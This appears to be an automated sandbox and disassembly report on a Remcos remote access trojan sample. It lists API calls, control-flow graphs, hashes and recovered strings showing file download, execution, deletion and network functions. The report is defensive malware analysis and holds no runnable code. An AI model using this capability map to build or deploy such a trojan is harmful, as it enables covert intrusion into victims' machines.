                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                    • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                    • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad$HandleModule
                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                    • API String ID: 4236061018-3687161714
                                    • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                    • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                    • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                    • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                    Function 00443355 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 465 443355-443361 call 448d49 468 443383-44338f call 4433da ExitProcess 465->468 469 443363-443371 GetPEB 465->469 469->468 470 443373-44337d GetCurrentProcess TerminateProcess 469->470 470->468
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG,004461B7,00000003), ref: 00443376
                                    • TerminateProcess.KERNEL32(00000000), ref: 0044337D
                                    • ExitProcess.KERNEL32 ref: 0044338F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID: PkGNG
                                    • API String ID: 1703294689-263838557
                                    • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                    • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                    • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                    • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                    Function 0040EA00 Relevance: 84.8, APIs: 14, Strings: 34, Instructions: 795COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 100 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->100 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e call 40d0a4 70->80 79->80 98 40ec27-40ec3d call 401fab call 4139e4 79->98 85 40ec43-40ec45 80->85 88 40ec47-40ec49 85->88 89 40ec4e-40ec55 85->89 92 40ef2c 88->92 93 40ec57 89->93 94 40ec59-40ec65 call 41b354 89->94 92->49 93->94 104 40ec67-40ec69 94->104 105 40ec6e-40ec72 94->105 98->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 100->126 104->105 108 40ecb1-40ecc4 call 401e65 call 401fab 105->108 109 40ec74-40ec7b call 407751 105->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 120 40ec87-40ec9a call 401e65 call 401fab 109->120 121 40ec7d-40ec82 call 407773 call 40729b 109->121 120->108 141 40ec9c-40eca2 120->141 121->120 156 40f3e0-40f3ea call 40dd7d call 414f65 126->156 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 203 40ed70-40ed74 call 401e65 177->203 179 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->234 182 40ee4a-40ee54 call 409092 180->182 183 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->183 193 40ee59-40ee7d call 40247c call 434829 182->193 183->193 211 40ee8c 193->211 212 40ee7f-40ee8a call 436f10 193->212 213 40ed79-40edb6 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 203->213 217 40ee8e-40ef03 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 call 434832 call 401e65 call 40b9f8 211->217 212->217 213->178 217->234 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 217->288 286 40f017-40f019 234->286 287 40effc 234->287 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->234 306 40ef2a 288->306 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->92 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 356 40f194-40f1a7 call 401e65 call 401fab 346->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->357 367 40f207-40f21a call 401e65 call 401fab 356->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 400 40f27b 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f322 call 401fab call 41353a 413->416 415->418 416->156 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 416->427 418->416 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                    APIs
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\keHuNxIumw.exe,00000104), ref: 0040EA29
                                      • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                    • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Users\user\AppData\Roaming\keHuNxIumw.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                    • API String ID: 2830904901-3389407072
                                    • Opcode ID: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                    • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                    • Opcode Fuzzy Hash: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                    • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                    Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                    • SetEvent.KERNEL32(?), ref: 00404E43
                                    • CloseHandle.KERNELBASE(?), ref: 00404E4C
                                    • closesocket.WS2_32(?), ref: 00404E5A
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                    • SetEvent.KERNEL32(?), ref: 00404EA2
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                    • SetEvent.KERNEL32(?), ref: 00404EBA
                                    • CloseHandle.KERNEL32(?), ref: 00404EBF
                                    • CloseHandle.KERNEL32(?), ref: 00404EC4
                                    • SetEvent.KERNEL32(?), ref: 00404ED1
                                    • CloseHandle.KERNEL32(?), ref: 00404ED6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                    • String ID: PkGNG
                                    • API String ID: 3658366068-263838557
                                    • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                    • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                    • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                    • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                    Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 473 4485e6-4485fa 474 448607-448622 LoadLibraryExW 473->474 475 4485fc-448605 473->475 477 448624-44862d GetLastError 474->477 478 44864b-448651 474->478 476 44865e-448660 475->476 481 44863c 477->481 482 44862f-44863a LoadLibraryExW 477->482 479 448653-448654 FreeLibrary 478->479 480 44865a 478->480 479->480 483 44865c-44865d 480->483 484 44863e-448640 481->484 482->484 483->476 484->478 485 448642-448649 484->485 485->483
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                    • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                    • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                    • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                    • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                    Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 486 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                    • GetLastError.KERNEL32 ref: 0040D0BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateErrorLastMutex
                                    • String ID: SG
                                    • API String ID: 1925916568-3189917014
                                    • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                    • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                    • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                    • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                    Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 489 44854a-448574 490 448576-448578 489->490 491 4485df 489->491 492 44857e-448584 490->492 493 44857a-44857c 490->493 494 4485e1-4485e5 491->494 495 448586-448588 call 4485e6 492->495 496 4485a0 492->496 493->494 501 44858d-448590 495->501 497 4485a2-4485a4 496->497 499 4485a6-4485b4 GetProcAddress 497->499 500 4485cf-4485dd 497->500 502 4485b6-4485bf call 434591 499->502 503 4485c9 499->503 500->491 504 4485c1-4485c7 501->504 505 448592-448598 501->505 502->493 503->500 504->497 505->495 506 44859a 505->506 506->496
                                    APIs
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc__crt_fast_encode_pointer
                                    • String ID:
                                    • API String ID: 2279764990-0
                                    • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                    • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                    • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                    • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                    Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 509 40165e-401664 510 401666-401668 509->510 511 401669-401674 509->511 512 401676 511->512 513 40167b-401685 511->513 512->513 514 401687-40168d 513->514 515 4016a8-4016a9 call 43455e 513->515 514->515 516 40168f-401694 514->516 519 4016ae-4016af 515->519 516->512 518 401696-4016a6 call 43455e 516->518 521 4016b1-4016b3 518->521 519->521
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                    • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                    • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                    • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                    Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 537 4461b8-4461c4 538 4461f6-446201 call 44062d 537->538 539 4461c6-4461c8 537->539 546 446203-446205 538->546 541 4461e1-4461f2 RtlAllocateHeap 539->541 542 4461ca-4461cb 539->542 543 4461f4 541->543 544 4461cd-4461d4 call 4455c6 541->544 542->541 543->546 544->538 549 4461d6-4461df call 443001 544->549 549->538 549->541
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                    • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                    • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                    • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF

                                    Non-executed Functions

                                    Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                    • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                      • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                      • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                      • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                      • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                      • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                    • DeleteFileA.KERNEL32(?), ref: 0040868D
                                      • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                      • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                      • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                      • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                    • Sleep.KERNEL32(000007D0), ref: 00408733
                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                      • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                    • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                    • API String ID: 1067849700-181434739
                                    • Opcode ID: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                    • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                    • Opcode Fuzzy Hash: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                    • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                    Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004056E6
